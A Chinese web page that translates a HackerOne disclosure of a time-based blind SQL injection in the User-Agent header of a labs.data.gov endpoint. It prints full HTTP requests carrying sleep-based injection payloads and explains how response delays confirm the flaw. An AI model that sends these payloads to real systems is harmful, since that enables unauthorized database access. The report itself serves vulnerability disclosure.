您当前的位置:首页 > 电脑百科 > 安全防护 > 数据安全

SQL注入之User-Agent注入

时间:2020-07-14 18:02:27  来源:  作者:

0x00漏洞信息

披露者:harisec

危害程度:高危

漏洞类型:sql注入

0x01漏洞介绍

通过访问:

https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent头在中进行SQL注入

我没有从数据库中提取任何数据,我已经使用sleep函数 SQL查询确认了该漏洞。该命令与算术操作相结合,将导致服务器响应不同的时间取决于算术运算的结果。

例如,将该值设置:

Mozilla/5.0 (windows NT 6.1; WOW64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

到User-Agent头部将导致服务器延迟响应25(5×5)秒。

要重现,请发送以下HTTPS请求:

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR' X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

服务器将在25(5 * 5)秒后响应-与User-Agent:标头的值相同。

现在,让服务器立即响应。我们将发送值sleep(5 * 5 * 0),它等于0。

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'

X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

服务器立即响应为5 * 5 * 0 = 0。

让我们通过另一个请求进行确认:

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'

X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

这次,有效负载包含6 * 6-30,等于6。服务器在6秒钟后响应。

这些只是我尝试确认此问题的带有各种算术运算的SQL查询中的一些。

0x02漏洞影响

攻击者可以操纵发送到MySQL数据库的SQL语句,并注入恶意SQL语句。攻击者可以更改对数据库执行的SQL语句的命令。

翻译自hackerone



Tags:User-Agent注入   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
0x00漏洞信息披露者:harisec危害程度:高危漏洞类型:sql注入0x01漏洞介绍通过访问:https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent头在中进行SQL注入我没...【详细内容】
2020-07-14  Tags: User-Agent注入  点击:(198)  评论:(0)  加入收藏
▌简易百科推荐
众所周知,Windows系统流氓软件众多,其中不乏出身大厂的产品。这些带有流氓性质的软件,很多都会偷偷扫描系统数据,读取用户文件,造成电脑卡顿拖慢不说,还严重侵害了个人隐私,造成巨...【详细内容】
2021-12-06  趣玩APPS    Tags:流氓软件   点击:(16)  评论:(0)  加入收藏
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  IT野涵    Tags:sql注入   点击:(21)  评论:(0)  加入收藏
互联网时代,不论是个人还是组织,都将数据视为一项重要的资产。为了便于存储、管理,企业常常会为各项数据建立一个数据库,如果没有做好安全风险防护,一旦数据库被攻占,企业将迎来很...【详细内容】
2021-10-28  快快网络   企鹅号  Tags:数据库   点击:(50)  评论:(0)  加入收藏
前言(可能思路狭隘,有缺有错,师傅们多带带)【查看资料】Author: 0ne本篇文章数据来源于18+省市级别HVV,90+单位失陷报告。(一部分是笔者的参与,一部分是薅的公司其他师傅的报告...【详细内容】
2021-10-28  IT野涵    Tags:缺口   点击:(46)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19    博客园  Tags:SQL注入   点击:(52)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  woaker    Tags:SQL注入漏洞   点击:(67)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  合天网安实验室    Tags:sql注入   点击:(60)  评论:(0)  加入收藏
“放纵自己的欲望是最大的祸害,窥探别人的隐私是最大的罪恶,不知自己的过失是最大的病痛”。 上文咱们知道了目前互联网的数据安全存在隐患,数据安全的问题,每天都在发生,只不过...【详细内容】
2021-08-13  小陶子矿工    Tags:IPFS   点击:(79)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  IT影子    Tags:sql注入   点击:(66)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  李志宽    Tags:SQL注入   点击:(74)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条